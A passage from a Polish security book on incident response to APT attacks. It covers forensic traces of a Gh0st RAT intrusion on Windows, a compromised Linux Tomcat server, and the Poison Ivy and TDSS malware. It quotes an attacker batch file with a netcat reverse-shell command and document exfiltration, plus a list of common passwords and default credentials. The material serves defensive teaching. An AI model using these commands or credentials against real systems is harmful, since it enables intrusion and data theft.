Pamiętasz odnośnik z e-maila?

Ponieważ na razie analiza dotyczyła sieci i procesów, proces reagowania na incydent

nie jest jeszcze kompletny. Wcześniej wspomniano już, że szkodliwe oprogramowanie

lub, jak w tej sytuacji, narzędzie RAT musi przetrwać ponowne uruchamianie

systemu.

Zapytania do rejestru. Aby sprawdzić podejrzane wpisy w rejestrze, należy zastosować

poniższe instrukcje. Pozwalają one określić ustawienia węzłów Run.

reg query hklm\software\microsoft\windows\currentversion\run /s

reg query hklm\software\microsoft\windows\currentversion\runonce /s

W trakcie analizowania rejestru warto też sprawdzić, czy w węźle Services nie

występują nietypowe nazwy usług, ścieżki do plików DLL usług lub niedopasowane

nazwy usług. Uruchom następujące polecenie:

reg query HKLM\system\currentcontrolset\services /s

 

402 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Zaplanowane zadania. Innym komponentem, który należy sprawdzić w podejrzanym

hoście, jest harmonogram zadań. Możliwe, że napastnik zaplanował wykonanie pewnych

operacji. Można to sprawdzić, uruchamiając poniższą instrukcję w wierszu

poleceń:

at

schtasks

Uruchomienie polecenia at na hoście ujawnia zaplanowane zadanie:

Zaplanowano wykonywanie pliku cleanup każdego dnia o 23.30. Należy pobrać

ten plik w celu przeprowadzenia dalszych analiz.

Dzienniki zdarze. Przed zapisaniem ciekawych plików (np. NTUSER.DAT lub plików

z historią odwiedzonych stron internetowych) warto zachować także dzienniki zdarzeń.

Za pomocą narzędzia psloglist z pakietu Sysinternals można łatwo pobrać

z podejrzanego systemu dzienniki systemowe i bezpieczeństwa.

W trakcie analizowania dzienników odkrywamy następujące zdarzenia:

A new process has been created:

New Process ID: 3464

Image File Name: C:\WINDOWS\system32\cmd.exe

Creator Process ID: 1040

User Name: Administrator

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 403

Domain: commercialcompany

Logon ID: (0x0,0x3E7)

A process has exited:

Process ID: 3440

Image File Name: C:\WINDOWS\system32\net.exe

User Name: Administrator

Domain: commercialcompany

Logon ID: (0x0,0x2394E)

Security Enabled Local Group Member Added:

Member ID: Fdpt_ltp1\Ch1n00k

Target Account Name: Administrators

Target Domain: commercialcompany

A process has exited:

Process ID: 2144

Image File Name: C:\WINDOWS\system32\mstsc.exe

User Name: Ch1n00k

Domain: commercialcompany

Logon ID: (0x0,0x2394E)

Object Open:

Object Server: Security

Object Type: File

Object Name: C:\WINDOWS\Tasks\At1.job

Handle ID: 11920

Operation ID: {0,39954625}

Process ID: 1040

Image File Name: C:\WINDOWS\system32\svchost.exe

Primary User Name: Ch1n00k

Primary Domain: commercialcompany

A process has exited:

Process ID: 3932

Image File Name: C:\WINDOWS\system32\ftp.exe

User Name: Ch1n00k

Domain: commercialcompany

Logon ID: (0x0,0x2394E)

W trakcie analizowania dzienników zdarzeń stało się jasne, że napastnicy wykonali

pewne operacje:

 otwarli wiersz poleceń,

 za pomocą polecenia net dodali konto Ch1n00k,

 otworzyli klienta usług TS,

 utworzyli zaplanowane zadanie,

 użyli protokołu FTP.

 

404 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Zdarzenia bezpieczeństwa o identyfikatorze 636 i 593 ujawniają wiele instrukcji

użytych przez napastników.

Katalog Prefetch. Jak wcześniej wspomnieliśmy, w większości systemów Windows

funkcja Prefetch jest domyślnie włączona. Katalog Prefetch obejmuje listę ostatnich 128

programów uruchomionych w systemie. Lista ta pomaga ustalić, które pliki wykonywalne

były używane i jakie programy uruchomił napastnik oraz jakie działania

podjął.

Zawartość katalogu Prefetch można wyświetlić z poziomu wiersza poleceń, co

pokazano poniżej. Następnie można skopiować listę do pliku tekstowego.

Pobieranie ciekawych plików. Po zarejestrowaniu w odpowiedniej kolejności zmiennych

danych można pobrać pewne ciekawe pliki, aby przeanalizować konkretny atak.

Oto one:

 ntuser.dat — obejmuje dane z profilów użytkowników;

 index.dat — obejmuje indeks żądanych adresów URL;

 pliki .rdp — obejmują informacje na temat zdalnych sesji;

 pliki .bmc — obejmują zapisane w pamięci podręcznej obrazy klienta RDC;

 pliki dziennika programu antywirusowego — obejmują alarmy dotyczące

wirusów.

Analizowanie plików .rdp. Plik .rdp (ang. Remote Desktop Files) obejmuje ciekawe informacje

na temat używanych serwerów, logowania itd. Domyślnie plik ten znajduje się

w katalogu /Dokumenty.

Na zainfekowanym hoście znajdujemy plik .rdp. Po sprawdzeniu czasu jego utworzenia,

modyfikacji i dostępu okazuje się, że w pliku niedawno wprowadzono zmiany.

Pliki .rdp można otworzyć w dowolnym edytorze tekstu, ponieważ mają format XML.

W pliku natrafiamy na następujące dane:

<server>

<name>HRserver.commercialcompany.com</name>

<displayName>HRserver.commercialcompany.com</displayName>

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 405

<thumbnailScale>1</thumbnailScale>

<logonSettings inherit="FromParent" />

<remoteDesktop inherit="FromParent" />

<localResources inherit="FromParent" />

</server>

<server>

<name>AD.commercialcompany.com</name>

<displayName>AD.commercialcompany.com</displayName>

<thumbnailScale>1</thumbnailScale>

<logonSettings inherit="FromParent" />

<remoteDesktop inherit="FromParent" />

<localResources inherit="FromParent" />

Wygląda na to, że napastnicy w poszukiwaniach informacji i danych uwierzytelniających

używali zdalnego pulpitu do połączenia się z innymi serwerami z sieci.

Można się o tym upewnić przez sprawdzenie następujących wpisów rejestru

(zobacz rysunek 6.15):

HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default

HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Server\UsernameHint

Rysunek 6.15. Ustawienia historii usug TS w rejestrze

Analizowanie plików .bmc. Gdy użytkownik łączy się ze zdalnym komputerem za pomocą

funkcji Pulpit zdalny, serwer przesyła do klienta bitmapę. Zapisanie tej bitmapy

 

406 Vademecum hackingu. Skuteczna obrona sieci przed atakami

w plikach .bmc pozwala znacznie poprawić wydajność programu Pulpit zdalny po

stronie klienta. Omawiane pliki są zwykle zapisywane w formie kafelków o wymiarach

64×64 piksele. Każdy kafelek ma niepowtarzalny skrót. Pliki .bmc standardowo znajdują

się w katalogu [nazwa użytkownika]\Local Settings\Application Data\Microsoft\

Terminal Server Client\Cache. Zbadanie tych plików pozwala lepiej poznać ruchy

napastnika w zainfekowanej sieci, ustalić używane aplikacje i pliki, a także zastosowane

dane uwierzytelniające (z konta, w którym znaleziono dany plik). Do odkodowywania

i wczytywania plików .bmc służy program BMC Viewer (rysunek 6.16;

w3bbo.com/bmc/#h2prog).

Rysunek 6.16. Korzystanie z narzdzia BMC Viewer

W trakcie wczytywania pliku .bmc do wspomnianego narzędzia należy wybrać

odpowiednią wielkość kafelka i kliknąć przycisk Load. Ustalanie rozmiaru (8, 16, 32

itd.) odbywa się metodą prób i błędów. Kliknij kafelek na ekranie, aby zapisać go jako

plik graficzny.

Wyszukiwanie anomalii w katalogu System32. Przydatną techniką sprawdzania katalogu

c:\WINDOWS\system32 pod kątem podejrzanych plików jest przeprowadzenie operacji

diff na tym katalogu i folderze z pamięci podręcznej. Pozwala to uzyskać listę

plików z tego katalogu zmodyfikowanych od momentu instalacji. Po ustawieniu

w filtrze odpowiedniej daty i czasu znaleziono następujące pliki:

 6to4ex.dll,

 Cleanup.bat,

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 407

 Ad.bat,

 D.rar,

 1.txt.

W trakcie analizowania plików .bat okazuje się, że napastnik użył pliku Cleanup.bat

do pozbycia się śladów z dzienników. Pamiętasz, że zaplanowano wykonywanie tego

pliku na godzinę 23.30 każdego dnia?

Plik Ad.bat służył do pobierania danych z innych maszyn domeny. Uzyskane w ten

sposób pliki były pakowane i przygotowywane do wysłania przez plik D.rar. W pliku

Ad.bat znajdują się ciekawe informacje:

cmd /C %TEMP%\nc -e cmd.exe 192.168.3.39

copy *.doc > %TEMP%\bundle.zip

Oznacza to, że w katalogu %Temp% umieszczono narzędzie netcat. Można je

wykorzystać jako odbiornik i utworzyć „furtkę” w zainfekowanym systemie. Następny

interesujący łańcuch znaków pokazuje, że napastnicy kopiują dokumenty do pliku

.zip umieszczonego w katalogu %Temp%.

Plik 1.txt zawiera listę haseł, które (nadal) są często stosowane:

123456

password

Password

1234

p@ssw0rd

p@$$w0rd

P@ssw0rd

P@$$w0rd

12345

sa

admin

letmein

master

pass

test

abc123

Choć wymienione pliki odkryto w jednym z systemów, należy sprawdzić, czy

nie występują także w innych systemach, ponieważ napastnik utworzył lokalne

konto administratora i z pewnością wykradał dokumenty z domeny.

Dzienniki programów antywirusowych. Początkowo w dziennikach programów antywirusowych

nie było żadnych wpisów dotyczących narzędzi RAT, które napastnicy

umieścili w systemie w celu zinfiltrowania firmy. Dlaczego nie wykryto narzędzia

netcat (nc.exe)? Większość aplikacji antywirusowych traktuje je jako potencjalnie

niepożądany program.

 

408 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Przyjrzyjmy się dokładniej konfiguracji programu antywirusowego w zaatakowanym

systemie. W trakcie sprawdzania ustawień okazuje się, że stosowano zasady

domyślne. Wiele programów antywirusowych ma zaawansowane ustawienia, które

pozwalają zwiększyć bezpieczeństwo hosta, natomiast rzadko są stosowane. W zasadach

występuje wyjątek widoczny na rysunku 6.17.

Rysunek 6.17. Wyjtek w programie antywirusowym

Po kliknięciu przycisku staje się jasne, dlaczego program antywirusowy nie wykrył

ani nie zablokował netcata (rysunek 6.18).

Rysunek 6.18. Program antywirusowy nie blokuje netcata

Napastnicy utworzyli wyjątek dla netcata. Musieli to zrobić przed skopiowaniem

pliku na zainfekowany komputer. Można się o tym przekonać, analizując wpisy

w katalogu Prefetch lub pliku MFT.

Inna sztuczka, za pomocą której napastnicy często ukrywają narzędzia przed

programami antywirusowymi i systemami IDS, polega na zmianie sygnatury pliku.

W trakcie ręcznego pakowania pliku (opis tej procedury można znaleźć w internecie)

tablica sekcji pliku (.date, .rsrc i .txt) często jest szyfrowana za pomocą niestandardowej

funkcji XOR (XOR to różnica symetryczna; jest to operator bitowy w arytmetyce

logicznej).

Sieć. Przydatne w śledztwie może okazać się przeanalizowanie danych przesyłanych

z zainfekowanego hosta na serwer C&C. Na podstawie takich analiz można

zidentyfikować inne zaatakowane hosty, zdefiniować reguły dla systemu IDS itd. Podsłuchiwanie

przesyłanych danych jest proste. Wystarczy zastosować Wiresharka —

narzędzie o otwartym dostępie do kodu źródłowego przeznaczone do analizy sieci.

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 409

Ponieważ wiadomo, że serwer C&C ma adres IP 192.168.6.128, można za pomocą

poniższego filtra Wiresharka uzyskać dane przesyłane na ten serwer.

ip.dst_host = = 192.168.6.128

Pozwala to uzyskać listę adresów IP maszyn łączących się z serwerem C&C.

Analiza pakietów pozwala stwierdzić, że każdy pakiet kierowany na serwer C&C

i pobierany z niego zaczyna się od słowa Gh0st (rysunek 6.19).

Rysunek 6.19. Analizowany pakiet

Na podstawie tych danych można utworzyć następny filtr Wiresharka:

"\x47\x68\x30\x73\x74" (Gh0st)

Tę samą sygnaturę można wykorzystać do utworzenia reguły Snorta, aby zablokować

przesyłane dane.

Podsumowanie ataku Gh0st

Za pomocą fałszywego e-maila napastnicy umieścili „furtki” w systemach, których

użytkownicy kliknęli szkodliwy odnośnik z wiadomości. „Furtka” była ukryta w standardowym

procesie, co pozwoliło zachować ją także po ponownym uruchomieniu

systemu. Analiza połączeń sieciowych wykazała, że nawiązano sesję z nieznanym

adresem IP. W trakcie sprawdzania dzienników zdarzeń stało się jasne, że napastnicy

badali wewnętrzną domenę, tworzyli konta i używali usług TS do łączenia się z innymi

klientami. Zbadanie czasu poszczególnych zdarzeń i wywołanie instrukcji diff dla

katalogu \System32 pozwoliło wykryć kilka dodanych plików. W trakcie ich analizy

stwierdzono, że napastnicy szukali dokumentów i pakowali je w celu ich wyprowadzenia.

Utworzyli też drugą „furtkę” za pomocą netcata. W dzienniku bezpieczeństwa

systemu Windows znaleziono nowe konto, Ch1n00k, za pomocą którego używano

klienta FTP. W harmonogramie zadań znaleziono nowe zadanie, którego wykonanie

zaplanowano na każdy wieczór, aby czyścić zawartość dzienników.

 

410 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Ataki APT na system Linux

Popularność 8

Łatwość przeprowadzenia 8

Szkodliwość 9

Ocena zagrożenia 8

Nie wszystkie ataki APT przeprowadza się na system Microsoft Windows. Linux

jest w równym stopniu narażony na atak i zainfekowanie przez usługi sieciowe, luki

w aplikacjach oraz usługi i udziały sieciowe. W przedstawionym tu scenariuszu opisano

wybrane związane z atakami APT artefakty, które można znaleźć w zainfekowanych

hostach z systemem Linux.

Systemem testowym jest tu host z Linuksem, na którym działa serwer Tomcat

z niebezpiecznymi danymi uwierzytelniającymi (danymi administratora bezpośrednio

skopiowanymi z przykładowej strony, wyświetlanej przy pierwszym łączeniu się

z Tomcatem i próbie przejścia do sekcji administracyjnej).

Wykorzystaliśmy narzędzie Metasploit Framework (MFS), aby przez usługę Tomcat

uzyskać dostęp do powłoki atakowanej maszyny. W trakcie testów penetracyjnych

kilkakrotnie zetknęliśmy się z tą techniką, dlatego zawsze sprawdzamy, czy można ją

zastosować. Omawiany scenariusz obejmuje odkrycie usługi Tomcat, znalezienie pliku

\shadow.bak (rysunek 6.20) i złamanie haseł.

Rysunek 6.20. Lokalizacja pliku Shadow.bak

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 411

Na potrzeby tego scenariusza załóżmy, że napastnicy wywołali instrukcję cat na

pliku /etc/passwd i znaleźli konto usługi, nagios, oraz administratora o nazwie jack,

którego hasło znajdowało się w polu gecos (gecos: Jack Black, password: jackblack).

Po uzyskaniu dostępu do konta Jacka wystarczy wywołać instrukcję sudo su -, ponieważ

na całym serwerze są ustawione domyślne opcje zabezpieczeń (zdarza się to

zdecydowanie za często).

Z poziomu konta administratora napastnicy instalują „furtkę” PHP, tworzą powłokę

z bitem SUID należącą do administratora (pozwala to odzyskać dostęp do konta

administratora po zmianie hasła) i pozostawiają dowody skanowania, ale tylko na

dysku RAM — jeśli komputer zostanie wyłączony, dowody znikną.

Przyjmijmy też, że napastnicy wykorzystują hosty pośredniczące, dlatego pozostawiają

bardzo dużo śladów na maszynie. Przejmują konto administratora, przejmują

host i zagrożona jest cała sieć.

Przejty host z Linuksem

Przybywamy do firmy i spotykamy się z zespołem klienta. Ustalamy, że dzieją się

dziwne rzeczy, a serwery WWW najwyraźniej są źródłem natężonego podejrzanego

ruchu. Nie ma jednak wyraźnych śladów włamania. Na szczęście pracownicy nie

wyłączyli serwera, a tylko zablokowali dostęp do niego na poziomie zapory.

Serwer znajduje się w wewnętrznej sieci w centrum danych. W zaporze na granicach

sieci jest stosowana statyczna translacja NAT, umożliwiająca dostęp do serwera

maszynom z poziomu internetu.

Klienci twierdzą, że nie mają ani chęci, ani czasu, żeby kogoś pozywać, chcą jednak

ustalić, czy maszyna została zainfekowana i co się dzieje. Dlatego przygotowanie

dokumentacji jest mniej istotne, choć musimy być przygotowani na zmianę zdania

przez klientów.

 

 

 

 

..

Cała książka jest do kupienia na

http://fraktalla.com/ksiazka/McClure-Stuart-ScambrayJoel-Kurtz-George/Vademecum-hackingu-7,62741001427KS

 

 

 

Otrzymujemy hasło do konta administratora i zaczynamy wstępne analizy działającego

hosta. Ponieważ organizacja jest niewielka i zatrudnia tylko jednego administratora

(Jacka), który odpowiada za wszystko, najpierw sprawdzamy historię jego

konta. Chcemy ustalić jego standardowe działania, aby móc wykryć nietypowe operacje.

Oznaki w amania

Niektóre polecenia z historii konta Jacka dają powody do obaw (rysunek 6.21).

Jack mówi, że nie przypomina sobie, żeby tworzył plik test-cgi.php. Jest to coś, co

warto dokładniej zbadać. Znajdujemy też inne nazwy plików, których Jack nie rozpoznaje

(np. system.sh). Także tych plików należy poszukać.

Ponadto instrukcja sudo su- jest wygodna, ale niebezpieczna. Wskazuje ona, że

jest używana domyślna (niezabezpieczona) konfiguracja programu sudo. Nie wróży

to dobrze.

 

412 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Rysunek 6.21. Historia wywoanych polece

Po krótkim przeglądzie katalogu z dziennikami zauważamy, że serwer Tomcat

skonfigurowano tak, aby rejestrował żądania dostępu. Wskazuje na to istnienie plików

localhost_access*. W plikach tych oprócz zapisów normalnych operacji znajdujemy

niepokojące wpisy, które mogą być oznaką włamania.

Zwracamy uwagę na wpisy PUT. Ktoś Z INTERNETU umieścił na serwerze aplikację

o skomplikowanej nazwie. Wygląda to podejrzanie — jakby ktoś korzystał

z Tomcata z uprawnieniami administratora.

Po rozmowie z Jackiem okazuje się, że wykorzystał on nazwę użytkownika i hasło

z przykładu z dokumentacji (tomcat/s3cret). Stosowanie domyślnych lub łatwych

do odgadnięcia danych uwierzytelniających jest niedopuszczalne. Możliwe, że to

właśnie jest przyczyną problemów firmy. Zwróć uwagę na czas (31 grudnia między

godziną 18.25 a 21.32). Jack nie zdawał sobie też sprawy, że można włamać się do

systemu operacyjnego, wykorzystując aplikację w rodzaju Tomcata.

Za pomocą narzędzia netstat sprawdzamy porty oczekujące na pakiety (rysunek

6.22). Żądamy numerów wszystkich takich portów (-a) powiązanych z nazwami

(-n) i usługami oczekującymi na pakiety (-l). Wyświetlamy też procesy używające

poszczególnych portów (-p).

Jeli system zosta zainfekowany rootkitem, nie mona ufa adnej z podanych instrukcji. Jeeli uyto

rootkita podczonego do wywoa systemowych, nie pomog nawet pewne, bezpieczne pliki binarne.

Pozostaje mie nadziej, e napastnicy nie s wystarczajco zaawansowani lub nie mieli czasu na

wprowadzenie tak duych zmian w systemie.

Uwaga

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 413

Rysunek 6.22. Informacje o portach oczekujcych na pakiety

Dane wyjściowe nie dają powodów do obaw. Widać w nich oczekiwane połączenie

z hostem i standardowe usługi.

Innym doskonałym narzędziem do sprawdzania otwieranych plików i usług

oczekujących na pakiety jest lsof. Uruchamiamy je z opcją –i, aby wyświetlić wszystkie

pliki otwarte w sieci (rysunek 6.23).

Rysunek 6.23. Otwierane pliki

 

414 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Także tu nie znajdujemy nic podejrzanego, idziemy więc dalej.

Nie istnieje jedno miejsce, w którym napastnicy ukrywają pliki. Znane są jednak

pewne popularne sztuczki:

 dyski RAM (obejmują pamięć zmienną i znikają po wyłączeniu zasilania);

 niewykorzystane sektory na dysku (ang. slack space);

 system plików /dev;

 trudne do zauważenia pliki lub katalogi (w Linuksie można utworzyć plik

lub katalog o nazwie „.. ” — kropka, kropka i odstęp);

 katalogi /tmp i /var/tmp, ponieważ wszyscy mają uprawnienia do zapisu do nich,

a administratorzy rzadko tu zaglądają.

W historii znaleźliśmy wpisy dotyczące katalogu /var/tmp, dlatego zaczynamy od

niego (rysunek 6.24).

Rysunek 6.24. Zawarto katalogu /var/tmp

Po wywołaniu samej instrukcji ls nie dostrzegamy niczego niezwykłego. Jednak

po dodaniu opcji –a (wyświetl wszystkie pliki) i –l (wyświetl wszystkie informacje)

okazuje się, że istnieją dwa katalogi „..” (kropka, kropka). Dodajemy opcję –b (wyświetlanie

znaków specjalnych) i widzimy, że jeden z nich to tak naprawdę kropka,

kropka i odstęp (rysunek 6.25). Jest to miejsce, w którym napastnik prawdopodobnie

ukrył pliki.

W katalogu „.. ” widzimy plik „...” z ustawionym bitem SUID. Właścicielem tego

pliku jest administrator (trzeba się temu przyjrzeć). Znajdujemy też skrypt powłoki

z historii instrukcji Jacka. Okazuje się, że skrypt ten tworzy dysk RAM i montuje go

w podkatalogu o niewinnej nazwie w katalogu /var/tmp. Instrukcja df (wyświetla

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 415

Rysunek 6.25. Podejrzane katalogi

ona zamontowane systemy plików) pozwala stwierdzić, że wspomniany dysk jest

zamontowany. Możemy coś tu znaleźć, zacznijmy jednak od pliku z bitem SUID

(rysunek 6.26).

Rysunek 6.26. Analizowanie podejrzanego pliku

 

416 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Za pomocą polecenia strings wyszukujemy wszystkie łańcuchy znaków w owym

pliku binarnym. Znajdujemy łańcuchy execve i /bin/sh — klasyczna powłoka z bitem

SUID należąca do administratora. Napastnicy chcieli ukryć ją w systemie, aby móc

odzyskać uprawnienia administratora, jeśli stracą nieograniczony dostęp do maszyny.

Można też wywołać polecenie find, aby znaleźć w katalogach konkretne rzeczy.

W UNIX-ie find to jedno z najważniejszych narzędzi z bardzo dużą liczbą opcji. Tu

wywołujemy je w celu znalezienia plików (-type f) z katalogów z dwóch poziomów

(-maxdepth 2; gdy nie ograniczyliśmy liczby poziomów, danych wyjściowych było

za dużo). Pliki sortujemy według daty utworzenia (-daystart) i chcemy zobaczyć

szczegółowe informacje na ich temat (-ls). Dane pokazano na rysunku 6.27.

Rysunek 6.27. Wyszukiwanie informacji w katalogach

Widoczne są tu znalezione wcześniej pliki, a także kilka dodatkowych, umieszczonych

w pamięci nietrwałej (dobrze, że Jack nie spanikował i nie wyłączył serwera).

W plikach z katalogu /var/tmp/syslog znajdujemy dowody przeprowadzenia rekonesansu

w sieci wewnętrznej. Coraz bardziej wygląda to na zaplanowany atak.

Natrafiamy na skrypt, który za pomocą instrukcji ping wykrywa aktywne systemy.

Ponieważ w systemie nie znajdujemy Nmapa, napastnicy najwyraźniej posługują się

własnymi narzędziami do odkrywania aktywnych systemów i ustalili w ten sposób

listę potencjalnych celów (rysunek 6.28).

Po uruchomieniu instrukcji strings dla pliku pps okazuje się, że napastnicy używają

małego samodzielnego skanera portów (rysunek 6.29).

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 417

Rysunek 6.28. Wykrywanie aktywnych systemów

Rysunek 6.29. Napastnicy korzystaj ze skanera portów

Aha! Skaner portów (ppscan)! Ustalamy też wersję i autora narzędzia.

Napastnikom udało się uzyskać dostęp do Tomcata, ale nie mieli dostępu do konta

administratora. W jaki sposób zdobyli pełną kontrolę nad hostem?

 

418 Vademecum hackingu. Skuteczna obrona sieci przed atakami

W danych wyjściowych polecenia last widać, że zalogowano się do konta nagios

(rysunek 6.30). Jest to konto usługi monitorowania hostów. Nie powinno się logować

na nie w standardowy sposób — a już na pewno nie z poziomu internetu!

Rysunek 6.30. Kto logowa si do konta nagios

Moment logowania pasuje do czasu ataku. W trakcie analizowania dozwolonych

portów okazuje się, że możliwe jest zdalne zarządzanie powłoką SSH. Uch! Dla konta

nagios także ustawiono łatwe do odgadnięcia dane uwierzytelniające (to zły dzień

dla Jacka). Hasło to nagios i zapewnia ono pełny dostęp do powłoki na hoście. Napastnik

zyskuje dzięki temu nowy sposób do poruszania się w systemie. W historii poleceń

uruchamianych z poziomu konta nagios znajdujemy inne dziwne instrukcje.

Ale skąd napastnicy wiedzieli, że mają zgadywać hasło do konta nagios? Mogli

wywołać instrukcję cat /etc/passwd, ponieważ wszyscy mają dostęp do pliku passwd.

Gdy napastnik pozna nazwy użytkowników, system jest chroniony tylko przez stosowane

zabezpieczenia (kontrolę dostępu, uruchamianie z minimalnymi uprawnieniami

itd.). Jednak gdy włamywacz ma dostęp do powłoki, zwykle tylko kwestią

czasu jest uruchomienie jej z uprawnieniami administratora.

Konto nagios ma dostęp do (domyślnej) powłoki /bin/bash, a Jack właśnie przyznał,

że jego hasło można łatwo odgadnąć na podstawie pola gecos (hasło to imię

i nazwisko Jacka; rysunek 6.31). Ponieważ program sudo działa z domyślnymi

ustawieniami, napastnik może bez problemów ustalić hasło Jacka, a następnie wywołać

instrukcję sudo su -, którą widzieliśmy w historii konta Jacka. Gra skończona.

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 419

Rysunek 6.31. Konto nagios ma dostp do powoki

A co z plikiem test-cgi.php (rysunek 6.32)?

Rysunek 6.32. Analizowanie pliku test-cgi.php

 

420 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Najwyraźniej nie jest to nieszkodliwy plik .php. Podejrzewamy, że jest to pewnego

rodzaju „furtka” dająca dostęp do powłoki przez kod w PHP (często pozwala on

nawiązywać odwrotne połączenia telnetowe itd.). Plik ten wygląda na wygenerowany

za pomocą pakietu Webacoo do tworzenia „furtek”.

Podsumowanie ataku APT na system Linux

Oto czego dowiedzieliśmy się w trakcie badań:

 Wiemy, że napastnikom udało się uzyskać dostęp do konta administratora

hosta. Uważamy, że wykorzystał do tego serwer Tomcat ze słabymi danymi

uwierzytelniającymi.

 Znaleźliśmy dowody działania skryptów i powłoki z bitem SUID. Dlatego

kimkolwiek był napastnik, chciał zachować dostęp i przygotował kilka sposobów

wejścia do systemu (konta, powłoka przez kod PHP, powłoka przez plik z bitem

SUID itd.).

 Napastnik badał środowisko i szukał innych celów.

 Z uwagi na zaawansowany charakter narzędzia Metasploit Framework

i podobnych programów jedną zainfekowaną maszynę można łatwo

wykorzystać jako host pośredniczący (ang. pivot host). Dzięki temu napastnik

może uzyskać dostęp do maszyn i wykorzystywać je bez instalowania narzędzi

na przejętym komputerze. Ponadto powłoki (np. Meterpreter) są zaprojektowane

tak, aby działały w pamięci, dlatego nie trzeba zapisywać żadnych danych

na dysku.

Poison Ivy

Popularność 10

Łatwość przeprowadzenia 10

Szkodliwość 9

Ocena zagrożenia 10

Poison Ivy to bardzo popularne narzędzie używane przez wielu napastników

w atakach APT. To szkodliwe oprogramowanie było rozwijane publicznie (www.

poisonivy-rat.com/) do roku 2008. Jednak kod źródłowy nadal jest dostępny w internecie.

Można go modyfikować i tworzyć w ten sposób niestandardowe trojany.

Najpopularniejszym sposobem rozpowszechniania i instalowania narzędzia Poison

Ivy jest ukierunkowany phishing z wykorzystaniem e-maili i programu do pobierania

trojanów (często jest on samorozpakowującym się plikiem o rozszerzeniu 7zip). To

narzędzie RAT wykorzystano w wielu atakach APT — Operation Aurora, RSA

(blogs.rsa.com/anatomy-of-an-attack/) i Nitro (www.symantec.com/content/en/us/

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 421

enterprise/media/security_response/whitepapers/the_nitro_attacks.pdf). Na rysunku 6.33

przedstawiono przykładowy e-mail wykorzystany w ramach ukierunkowanego phishingu

w atakach Nitro.

Rysunek 6.33. Przykadowy e-mail rozsyany w ramach ukierunkowanego phishingu w atakach

Nitro ( ródo: Symantec 2011)

Funkcje i działanie narzędzia Poison Ivy przypominają Gh0sta. Dlatego jeśli narzędzia

te zostaną zastosowane w atakach APT, w trakcie reagowania na incydent i śledztwa

będą znajdowane podobne artefakty. Gdy użytkownik otwiera załącznik w e-mailu

 

422 Vademecum hackingu. Skuteczna obrona sieci przed atakami

rozsyłanym w ramach ukierunkowanego phishingu, instalowany jest program pobierający

furtkę”. Program ten kieruje żądania aktualizacji pod odpowiedni adres

i powiadamia napastników, że jest aktywny (wysyła przy tym informacje na temat

systemu z zainfekowanego hosta). Napastnicy mogą wykorzystać punkt wejścia do

zinfiltrowania organizacji. Zalety narzędzia Poison Ivy nie ograniczają się jednak do

możliwości instalowania „furtek” — może ono pełnić także funkcję serwera pośredniczącego.

Na rysunku 6.34 przedstawiono panel administracyjny tego narzędzia.

Rysunek 6.34. Panel administracyjny narzdzia Poison Ivy

Microsoft udostępnił raport ze szczegółowym opisem funkcji (i zagrożeń) narzędzia

Poison Ivy (www.microsoft.com/en-us/download/details.aspx?displaylang=en&id=

27871). Pozwala on zrozumieć, jak popularny stał się ten program od czasu jego

odkrycia w 2005 roku. W październiku 2011 roku Microsoft poinformował, że oprogramowanie

MSRT (ang. Malicious Software Removal Tool) wykryło ponad 16 000

komputerów zainfekowanych trojanem do pobierania „furtek” z narzędzia Poison

Ivy. W całym 2011 roku średnia liczba wykryć tego narzędzia przez różne rozwią-

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 423

zania z obszaru bezpieczeństwa wynosiła od 4000 do 14 000 miesięcznie (co po dodaniu

do 16 000 znalezionych przez program MSRT daje w sumie ponad 58 000 zainfekowanych

komputerów). Przypadki te dotyczyły różnych instytucji komercyjnych

i rządowych z całego świata.

Trzeba zauważyć, że z uwagi na powszechną dostępność narzędzie Poison Ivy

często stosuje się w prostych, szybkich włamaniach do komputerów. Jest to dowód

na to, że zastosowanie narzędzia Poison Ivy nie musi oznaczać ataku APT. Dopiero

powtarzane próby uzyskania dostępu do systemu i obserwowanie go lub wyprowadzanie

informacji z firmy świadczą o takim ataku.

TDSS (TDL 1 – 4)

Popularność 5

Łatwość przeprowadzenia 8

Szkodliwość 9

Ocena zagrożenia 8

Przynajmniej od 2008 roku działa zaawansowane szkodliwe oprogramowanie, które

doprowadziło do powstania sieci ponad pięciu milionów zainfekowanych hostów

wykorzystywanych przez organizację przestępczą prowadzącą operacje na całym

świecie i przez powiązanych abonentów. W sieci tej działa trudne do wykrycia szkodliwe

oprogramowanie, które instaluje rootkita. Używa szyfrowanych plików i połączeń,

a komunikację C&C prowadzi przez duży zbiór zainfekowanych hostów (działających

jak prywatne lub anonimowe serwery pośredniczące), otwarte serwery

pośredniczące, a nawet sieci P2P. To szkodliwe oprogramowanie to TDSS. Znane są

jego wersje TDL 1, 2, 3 i 4, a nawet oparte na nim narzędzia Zero Access i Purple Haze.

Choć TDSS działa inaczej niż narzędzia RAT, jest wykorzystywany przez napastników

(bezpośrednio i pośrednio) w atakach APT w zależności od tego, jakich funkcji

potrzebują abonenci (rysunek 6.35). Największą zaletą narzędzia TDSS jest łatwość

włamywania się. Wynika ona z obsługi wielu sposobów infekowania (eksploity

zero-day aplikacji i serwerów, pakiet Black Hole Exploit, ukierunkowany phishing

oparty na e-mailach, wirusowe robaki rozsyłane przez technologie P2P, IM i NetBIOS,

szkodliwe serwery DHCP itd.). Pozwalają one nie tylko infekować komputery, ale też

powiększać sieci botnet.

Sieć botnet jest zwykle używana jako platforma MaaS (ang. Malware as a Service)

dla abonentów, którzy wykonują różne operacje — przeprowadzają rozproszone ataki

